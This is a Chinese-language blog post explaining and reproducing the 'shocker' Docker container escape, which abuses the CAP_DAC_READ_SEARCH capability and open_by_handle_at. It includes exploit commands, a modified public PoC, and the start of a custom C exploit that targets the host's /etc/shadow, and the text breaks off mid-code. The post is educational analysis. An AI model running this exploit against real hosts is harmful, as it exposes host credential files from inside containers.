<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>容器安全之shocker攻击 - foyjog blog</title><link rel="manifest" href="/manifest.json"><meta name="theme-color" content="dark"><meta name="application-name" content="foyjog"><meta name="msapplication-TileColor" content="dark"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="foyjog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="漏洞简介危害：容器内可以访问宿主机大部分文件 漏洞要求：容器内进程需要CAP_DAC_READ_SEARCH capability的权限 漏洞复现在Docker版本&amp;lt; 1.0中，docker内的进程拥有CAP_DAC_READ_SEARCH capability的权限，该capability的描述如下​​ : link"><meta property="og:type" content="article"><meta property="og:title" content="foyjog&#039;s blog"><meta property="og:url" content="http://foyjog.github.io/2021/07/13/%E5%AE%B9%E5%99%A8%E5%AE%89%E5%85%A8%E4%B9%8Bshocker%E6%94%BB%E5%87%BB/"><meta property="og:site_name" content="foyjog blog"><meta property="og:description" content="漏洞简介危害：容器内可以访问宿主机大部分文件 漏洞要求：容器内进程需要CAP_DAC_READ_SEARCH capability的权限 漏洞复现在Docker版本&amp;lt; 1.0中，docker内的进程拥有CAP_DAC_READ_SEARCH capability的权限，该capability的描述如下​​ : link"><meta property="og:locale" content="en_US"><meta property="og:image" content="http://foyjog.github.io/img/image-20210713111916790.png"><meta property="og:image" content="http://foyjog.github.io/img/host-mount-files.png"><meta property="og:image" content="http://foyjog.github.io/img/image-20210713190546925.png"><meta property="article:published_time" content="2021-07-13T02:44:48.000Z"><meta property="article:modified_time" content="2021-07-13T11:13:15.442Z"><meta property="article:author" content="foyjog"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="/img/image-20210713111916790.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://foyjog.github.io/2021/07/13/%E5%AE%B9%E5%99%A8%E5%AE%89%E5%85%A8%E4%B9%8Bshocker%E6%94%BB%E5%87%BB/"},"headline":"容器安全之shocker攻击","image":["http://foyjog.github.io/img/image-20210713111916790.png","http://foyjog.github.io/img/host-mount-files.png","http://foyjog.github.io/img/image-20210713190546925.png"],"datePublished":"2021-07-13T02:44:48.000Z","dateModified":"2021-07-13T11:13:15.442Z","author":{"@type":"Person","name":"foyjog"},"publisher":{"@type":"Organization","name":"foyjog blog","logo":{"@type":"ImageObject"}},"description":"漏洞简介危害：容器内可以访问宿主机大部分文件 漏洞要求：容器内进程需要CAP_DAC_READ_SEARCH capability的权限 漏洞复现在Docker版本&lt; 1.0中，docker内的进程拥有CAP_DAC_READ_SEARCH capability的权限，该capability的描述如下​​ : link"}</script><link rel="canonical" href="http://foyjog.github.io/2021/07/13/%E5%AE%B9%E5%99%A8%E5%AE%89%E5%85%A8%E4%B9%8Bshocker%E6%94%BB%E5%87%BB/"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.2/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script><!--!--><!--!--><meta name="generator" content="Hexo 5.4.0"></head><body class="is-1-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">foyjog blog</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-12"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item">Posted&nbsp;<time dateTime="2021-07-13T02:44:48.000Z" title="2021/7/13 上午10:44:48">2021-07-13</time></span><span class="level-item">Updated&nbsp;<time dateTime="2021-07-13T11:13:15.442Z" title="2021/7/13 下午7:13:15">2021-07-13</time></span><span class="level-item">22 minutes read (About 3342 words)</span></div></div><h1 class="title is-3 is-size-4-mobile">容器安全之shocker攻击</h1><div class="content"><h3 id="漏洞简介"><a href="#漏洞简介" class="headerlink" title="漏洞简介"></a>漏洞简介</h3><p><strong>危害</strong>：容器内可以访问宿主机大部分文件</p>
<p><strong>漏洞要求</strong>：容器内进程需要<code>CAP_DAC_READ_SEARCH</code> capability的权限</p>
<h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>在Docker版本&lt; 1.0中，docker内的进程拥有<code>CAP_DAC_READ_SEARCH</code> capability的权限，该capability的描述如下​​ : <a target="_blank" rel="noopener" href="https://man7.org/linux/man-pages/man7/capabilities.7.html">link</a></p>
<span id="more"></span>

<blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">CAP_DAC_READ_SEARCH</span><br><span class="line">             * Bypass file read permission checks and directory read</span><br><span class="line">               and execute permission checks;</span><br><span class="line">             * invoke open_by_handle_at(2);</span><br><span class="line">             * use the linkat(2) AT_EMPTY_PATH flag to create a link to</span><br><span class="line">               a file referred to by a file descriptor.</span><br></pre></td></tr></table></figure>
</blockquote>
<p>从描述中可以看出，拥有该权限，<strong>可以绕过文件的读权限检查和目录的读和执行权限检查。<code>open_by_handle_at</code>该系统调用需要该cap的权限才能执行。</strong></p>
<p><code>open_by_handle_at</code> 解释如下：<a target="_blank" rel="noopener" href="https://man7.org/linux/man-pages/man2/open_by_handle_at.2.html">link</a> </p>
<blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">The caller must have the CAP_DAC_READ_SEARCH capability to invoke</span><br><span class="line">       open_by_handle_at().</span><br></pre></td></tr></table></figure>
</blockquote>
<p>当前docker版本已经远大于1.0了，<code>CAP_DAC_READ_SEARCH</code> 权限已经默认不开启。需要复现的话，我们可以在新版本的docker中，手动加上<code>CAP_DAC_READ_SEARCH</code>该capability的权限。</p>
<p>启动如下docker并查看其capability：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> docker run -itd --cap-add CAP_DAC_READ_SEARCH ubuntu /bin/bash</span></span><br><span class="line">35a80d6e81bdebbc14e2d338c960e8a2131c1b6a72356bd4075313348b5f7b30</span><br><span class="line"><span class="meta">$</span><span class="bash"> docker top 35</span></span><br><span class="line">UID   PID    PPID   C    STIME    TTY     TIME      CMD</span><br><span class="line">root  1154   1120   0    03:04    pts/0   00:00:00  /bin/bash</span><br><span class="line"><span class="meta">$</span><span class="bash"> getpcaps 1154</span></span><br><span class="line">Capabilities for `1154&#x27;: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>看到该容器内已经有了<code>cap_dac_read_search</code>的权限。</p>
<p>下载 <a target="_blank" rel="noopener" href="https://github.com/gabrtv/shocker">https://github.com/gabrtv/shocker</a> 中的shocker.c 的poc，更改shocker.c中 .dockerinit 文件为 /etc/hosts </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// get a FS reference from something mounted in from outside</span></span><br><span class="line"><span class="keyword">if</span> ((fd1 = open(<span class="string">&quot;/.dockerinit&quot;</span>, O_RDONLY)) &lt; <span class="number">0</span>)</span><br><span class="line">  die(<span class="string">&quot;[-] open&quot;</span>);</span><br><span class="line"><span class="comment">//更改如下，这个文件需要和宿主机在同一个挂载的文件系统下，而高版本的.dockerinit已经不在宿主机的文件系统下了。</span></span><br><span class="line"><span class="comment">//但是/etc/resolv.conf,/etc/hostname,/etc/hosts等文件仍然是从宿主机直接挂载的，属于宿主机的文件系统。</span></span><br><span class="line"><span class="keyword">if</span> ((fd1 = open(<span class="string">&quot;/etc/hosts&quot;</span>, O_RDONLY)) &lt; <span class="number">0</span>)</span><br><span class="line">  die(<span class="string">&quot;[-] open&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>编译后，docker cp到容器内运行，结果为容器中访问到了<strong>宿主机的/etc/shadow文件</strong>。</p>
<p><img src="/img/image-20210713111916790.png" alt="shocker攻击并获取宿主机文件"></p>
<h3 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h3><h4 id="Capability-介绍"><a href="#Capability-介绍" class="headerlink" title="Capability 介绍"></a>Capability 介绍</h4><p>我们对sudo机制比较熟悉，通过sudo su 我们可以直接切换成root用户，原因在于sudo 程序具有SUID位，具有SUID位的程序在执行的时候，会获得该文件拥有者的权限，sudo程序的拥有者是root用户，所以我们在执行sudo的时候，sudo程序获得的是root的权限。</p>
<p>查看sudo程序，其中<code>-rwsr-xr-x</code>中的s即代表SUID位，同时该文件的拥有者为root。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> ls -al /usr/bin/sudo</span></span><br><span class="line">-rwsr-xr-x 1 root root 149080 Sep 23  2020 /usr/bin/sudo</span><br></pre></td></tr></table></figure>

<p>虽然这样可以解决一些权限的问题（比如sudo ,passwd 都具有SUID位），但是如果SUID程序本身存在漏洞的话，那么就会导致权限提升的问题，典型案例参考漏洞CVE-2021-3156 - Linux sudo权限提升。</p>
<p>所以Linux增加了一种Capability 的机制，该机制将一些高级别的权限，划分的更加细致，包括CAP_AUDIT_CONTROL，CAP_BPF等等一系列的权限。</p>
<p>下面用个实例来解释一下Capbility的功能。</p>
<p>我们知道，wireshark在安装的时候，可以使用非root用户进行数据包的抓取，这里的原理是什么？是不是wireshark的程序设置了SUID位，我们可以先看下wireshark的抓包程序dumpcap的属性。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> ls -al /usr/bin/dumpcap <span class="comment">#（也可能是/usr/sbin/dumpcap）</span></span></span><br><span class="line">-rwxr-xr-- 1 root wireshark 104688 Sep  5  2019 /usr/bin/dumpcap</span><br></pre></td></tr></table></figure>

<p>可以看到，<code>dumpcap</code>没有suid位，所以执行该命令的话，并不能获取root的权限。</p>
<p>而这里真正起作用的，便是Capability 机制，使用如下命令查看<code>/usr/bin/dumpcap</code>的capability。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> <span class="built_in">getcap</span> /usr/bin/dumpcap</span></span><br><span class="line">/usr/bin/dumpcap = cap_net_admin,cap_net_raw+eip</span><br></pre></td></tr></table></figure>

<p><code>dumpcap</code>拥有<code>cap_net_admin</code>和<code>cap_net_raw</code>的两个cap权限，这两个权限的机制解释如下：<a target="_blank" rel="noopener" href="https://man7.org/linux/man-pages/man7/capabilities.7.html">Link</a></p>
<blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">CAP_NET_ADMIN</span><br><span class="line">              Perform various network-related operations:</span><br><span class="line">              * interface configuration;</span><br><span class="line">              * administration of IP firewall, masquerading, and</span><br><span class="line">                accounting;</span><br><span class="line">              * modify routing tables;</span><br><span class="line">              * bind to any address for transparent proxying;</span><br><span class="line">              * set type-of-service (TOS);</span><br><span class="line">              * clear driver statistics;</span><br><span class="line">              * set promiscuous mode;</span><br><span class="line">              * enabling multicasting;</span><br><span class="line">              * use setsockopt(2) to set the following socket options:</span><br><span class="line">                SO_DEBUG, SO_MARK, SO_PRIORITY (for a priority outside</span><br><span class="line">                the range 0 to 6), SO_RCVBUFFORCE, and SO_SNDBUFFORCE.</span><br><span class="line">CAP_NET_RAW</span><br><span class="line">              * Use RAW and PACKET sockets;</span><br><span class="line">              * bind to any address for transparent proxying.</span><br></pre></td></tr></table></figure>
</blockquote>
<p>这两个cap包含了大部分网络操作所需要的权限，所以<code>dumpcap</code>即使在wireshark用户组的条件下， 仍然能够进行网络数据包的抓取。</p>
<p>按照如下方法将vagrant用户加入wireshark 用户组，重新登录后执行<code>dumpcap</code>命令进行数据包的抓取。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> sudo usermod -a -G wireshark vagrant</span></span><br><span class="line"><span class="meta">#</span><span class="bash">重新登录</span></span><br><span class="line"><span class="meta">$</span><span class="bash"> id</span></span><br><span class="line">uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),120(wireshark),999(docker)</span><br><span class="line"><span class="meta">$</span><span class="bash"> /usr/bin/dumpcap</span></span><br><span class="line">Capturing on &#x27;docker0&#x27;</span><br><span class="line">File: /tmp/wireshark_docker0_20210713035535_sMQ8Fy.pcapng</span><br><span class="line">Packets captured: 0</span><br><span class="line">Packets received/dropped on interface &#x27;docker0&#x27;: 0/0 (pcap:0/dumpcap:0/flushed:0/ps_ifdrop:0) (0.0%)</span><br></pre></td></tr></table></figure>

<p>从上面可以知道，当一个程序拥有特殊的cap权限的时候，是可以做一些高权限的事情的。比如<code>cap_net_admin</code>,<code>cap_net_raw</code>可以直接进行抓包。 <code>cap_setuid</code>这个权限可以直接更改用户的UID（如果具有该权限的程序可以执行任意代码的话，比如python等，那么就可以随意提权至root用户）。</p>
<p>而shocker漏洞，就是<code>CAP_DAC_READ_SEARCH </code>这个权限导致的问题，上面的参考提到，<code>open_by_handle_at</code>是需要这个权限的，接下来就对<code>open_by_handle_at</code>这个系统调用进行分析。</p>
<h4 id="open-by-handle-at系统调用"><a href="#open-by-handle-at系统调用" class="headerlink" title="open_by_handle_at系统调用"></a>open_by_handle_at系统调用</h4><p>直接看官方的文档说明：<a target="_blank" rel="noopener" href="https://man7.org/linux/man-pages/man2/open_by_handle_at.2.html">link</a></p>
<blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">The name_to_handle_at() and open_by_handle_at() system calls</span><br><span class="line">split the functionality of openat(2) into two parts:</span><br><span class="line">name_to_handle_at() returns an opaque handle that corresponds to</span><br><span class="line">a specified file; open_by_handle_at() opens the file</span><br><span class="line">corresponding to a handle returned by a previous call to</span><br><span class="line">name_to_handle_at() and returns an open file descriptor.</span><br></pre></td></tr></table></figure>
</blockquote>
<p><code>open_by_handle_at</code>需要和<code>name_to_handle_at</code>这个系统调用进行配合，这两个函数将openat函数分成了两部分，首先由<code>name_to_handle_at</code>指定文件名，打开一个文件并获取这个文件的<code>handle</code>指针。然后传递给<code>open_by_handle_at</code>，由<code>open_by_handle_at</code>通过这个指针打开文件并返回一个<code>fd</code>文件描述符。</p>
<p>我们先看<code>name_to_handle_at</code>的参数和使用方法：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">name_to_handle_at</span><span class="params">(<span class="keyword">int</span> dirfd, <span class="keyword">const</span> <span class="keyword">char</span> *pathname,</span></span></span><br><span class="line"><span class="params"><span class="function">                            struct file_handle *handle,</span></span></span><br><span class="line"><span class="params"><span class="function">                            <span class="keyword">int</span> *mount_id, <span class="keyword">int</span> flags)</span></span>;</span><br></pre></td></tr></table></figure>

<p>第一个参数位<code>dirfd</code>，即目录的文件描述符（可以设置为<code>AT_FDCWD</code> -&gt; <code>pathname</code>则是相对于进程当前工作目录的相对路径），第二个参数为文件路径，第三个参数为重要的结构体 <code>file_handle</code>，第四个参数为返回值，返回的是该文件的mount_id，第五个参数设置为0即可。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">file_handle</span> &#123;</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span>  handle_bytes;   <span class="comment">/* Size of f_handle [in, out] */</span></span><br><span class="line">	<span class="keyword">int</span>           handle_type;    <span class="comment">/* Handle type [out] */</span></span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">char</span> f_handle[<span class="number">0</span>];    <span class="comment">/* File identifier (sized by caller) [out] */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p><code>file_handle</code>的结构体如上所示，注意这里只有<code>handle_bytes</code>需要输入，其它的值都是返回的。</p>
<p>官方给出一个例子用来描述<code>name_to_handle_at</code>的使用方法：<a target="_blank" rel="noopener" href="https://github.com/foyjog/shocker-attack/blob/main/t_name_to_handle_at.c">link</a></p>
<p>编译之后，调用结果如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> ./t_name_to_handle_at /etc/passwd</span></span><br><span class="line">26</span><br><span class="line">8 1    bc 13 01 00 f4 cc 27 36</span><br></pre></td></tr></table></figure>

<p>26 代表<code>/etc/passwd</code>的<code>mount_id</code> ，8是<code>file_handle</code>的<code>handle_bytes</code>，1是<code>handle_type</code>。后八个字节则是<code>f_handle</code>，他的大小等于<code>handle_bytes</code>（8个字节）。</p>
<p><code>mount_id</code>可以通过<code>cat /proc/self/mountinfo</code>获取，可以看到<code>/etc/passwd</code>是挂载在/根目录下。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> cat /proc/self/mountinfo</span></span><br><span class="line">21 26 0:20 / /sys rw,nosuid,nodev,noexec,relatime shared:7 - sysfs sysfs rw</span><br><span class="line">22 26 0:4 / /proc rw,nosuid,nodev,noexec,relatime shared:13 - proc proc rw</span><br><span class="line">23 26 0:6 / /dev rw,nosuid,relatime shared:2 - devtmpfs udev rw,size=491532k,nr_inodes=122883,mode=755</span><br><span class="line">24 23 0:21 / /dev/pts rw,nosuid,noexec,relatime shared:3 - devpts devpts rw,gid=5,mode=620,ptmxmode=000</span><br><span class="line">25 26 0:22 / /run rw,nosuid,noexec,relatime shared:5 - tmpfs tmpfs rw,size=100860k,mode=755</span><br><span class="line">26 0 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw,data=ordered</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p><strong>注：</strong>mount的文件类型有多种，<code>name_to_handle_at</code>对一些文件系统是不支持的，比如docker本身挂载的overlay2类型，这也是文章开头所说，漏洞危害是容器内可以访问宿主机<strong>大部分</strong>文件。 详情如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> ./t_name_to_handle_at /var/lib/docker/overlay2/099d3a43680579b1115173faa2e32e698451d6d0551b28122310eaf78d593cd0/merged/etc/passwd</span></span><br><span class="line"></span><br><span class="line">Operation not supported</span><br><span class="line">Unexpected result from name_to_handle_at()</span><br></pre></td></tr></table></figure>

<p><code>f_handle</code>前4个字节为0x0113bc（70588），这个值等于<code>/etc/passwd</code>的<code>inodeid</code>。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> <span class="built_in">stat</span> /etc/passwd</span></span><br><span class="line">File: /etc/passwd</span><br><span class="line">Size: 1773      	Blocks: 8          IO Block: 4096   regular file</span><br><span class="line">Device: 801h/2049d	Inode: 70588       Links: 1</span><br><span class="line">Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)</span><br></pre></td></tr></table></figure>

<p>理一下，<code>name_to_handle_at</code>需要调用两次:</p>
<ol>
<li>第一次输入文件名，函数返回该文件的<code>mount_id</code>及其对应的<code>file_handle</code>结构体指针，该结构体包括了<code>handle_bytes</code>的大小（即<code>f_handle</code>的大小）。</li>
<li>利用第一次得到的<code>f_handle</code>的大小，重新调整<code>file_handle</code>结构体的大小并作为第二次调用<code>name_to_handle_at</code>的输入，函数返回f_handle的值（4+x个字节），其前四个字节为文件的<code>inodeid</code>。后x个字节是每个文件都有的固定的一个值。<strong>（上面的事例可以得知，ext4文件类型中，<code>handle_bytes</code>为8，x个字节为4个字节）</strong>。</li>
</ol>
<p>分析了<code>name_to_handle_at</code>，主要是为了理解<code>open_by_handle_at</code>的输入是什么，现在看一下<code>open_by_handle_at</code>的函数原型：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">open_by_handle_at</span><span class="params">(<span class="keyword">int</span> mount_fd, struct file_handle *handle,<span class="keyword">int</span> flags)</span></span>;</span><br></pre></td></tr></table></figure>

<p><code>mount_fd</code>解释如下：</p>
<blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">The mount_fd argument is a file descriptor for any object (file,</span><br><span class="line">directory, etc.)  in the mounted filesystem with respect to which</span><br><span class="line">handle should be interpreted.  The special value AT_FDCWD can be</span><br><span class="line">specified, meaning the current working directory of the caller.</span><br></pre></td></tr></table></figure>
</blockquote>
<p>该参数可以是一个已mount文件系统上的任意一个文件的文件描述符，这就是为什么一开始我们poc中，需要将/.dockerinit 文件名，改为 /etc/hosts，因为我们需要读取宿主机根文件系统中的文件，/etc/resolv.conf，/etc/hostname，/etc/hosts等文件在新版本的docker中，仍然是从宿主机直接挂载的，属于宿主机的根文件系统。</p>
<p><img src="/img/host-mount-files.png" alt="宿主机根文件系统"></p>
<p><code>*handle</code>就非常明确了，我们刚才所分析<code>name_to_handle_at</code>所返回的参数。<code>flags</code>参数和open类似。</p>
<p>按照官方的例子，使用<code>open_by_handle_at</code>读取<code>name_to_handle_at</code>所指定的文件内容。<a target="_blank" rel="noopener" href="https://github.com/foyjog/shocker-attack/blob/main/t_open_by_handle_at.c">link</a></p>
<blockquote>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> <span class="built_in">echo</span> <span class="string">&#x27;Can you please think about it?&#x27;</span> &gt; cecilia.txt</span></span><br><span class="line"><span class="meta">$</span><span class="bash"> ./t_name_to_handle_at cecilia.txt &gt; fh</span></span><br><span class="line"><span class="meta">$</span><span class="bash"> ./t_open_by_handle_at &lt; fh</span></span><br><span class="line">open_by_handle_at: Operation not permitted</span><br><span class="line"><span class="meta">$</span><span class="bash"> sudo ./t_open_by_handle_at &lt; fh      <span class="comment"># Need CAP_SYS_ADMIN</span></span></span><br><span class="line">Read 31 bytes</span><br><span class="line"><span class="meta">$</span><span class="bash"> rm cecilia.txt</span></span><br></pre></td></tr></table></figure>
</blockquote>
<h4 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h4><p>如果我们想要在虚拟机中通过<code>open_by_handle_at</code>读取宿主机的文件的话，那么需要两个关键的参数。</p>
<ol>
<li>宿主机文件系统中文件的文件描述符：这个很容易，直接打开/etc/hosts文件获取其文件描述符就行。</li>
<li><code>file_handle</code>的<code>handle_bytes</code>成员（ext4为8），<code>handle_type</code>成员（1）和<code>f_handle</code>成员（<code>inodeid</code>+4个未知字节）。</li>
</ol>
<p>先在宿主机中查看 <code>/etc/shadow</code> 的<code>file_handle</code>。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> ./t_name_to_handle_at /etc/shadow</span></span><br><span class="line">26</span><br><span class="line">8 1    25 18 01 00 c6 fd c8 4d</span><br></pre></td></tr></table></figure>

<p>编写如下poc，然后在docker中执行。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _GNU_SOURCE</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;errno.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;limits.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">die</span><span class="params">(<span class="keyword">const</span> <span class="keyword">char</span> *msg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	perror(msg);</span><br><span class="line">	<span class="built_in">exit</span>(errno);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line">	<span class="keyword">char</span> read_buf[<span class="number">0x1000</span>];</span><br><span class="line">	<span class="class"><span class="keyword">struct</span> <span class="title">file_handle</span> *<span class="title">fhp</span>;</span></span><br><span class="line">	<span class="keyword">int</span> handle_bytes = <span class="number">8</span>;</span><br><span class="line">	<span class="keyword">char</span> f_handle[<span class="number">8</span>] = &#123;<span class="number">0x25</span>, <span class="number">0x18</span>, <span class="number">0x01</span>, <span 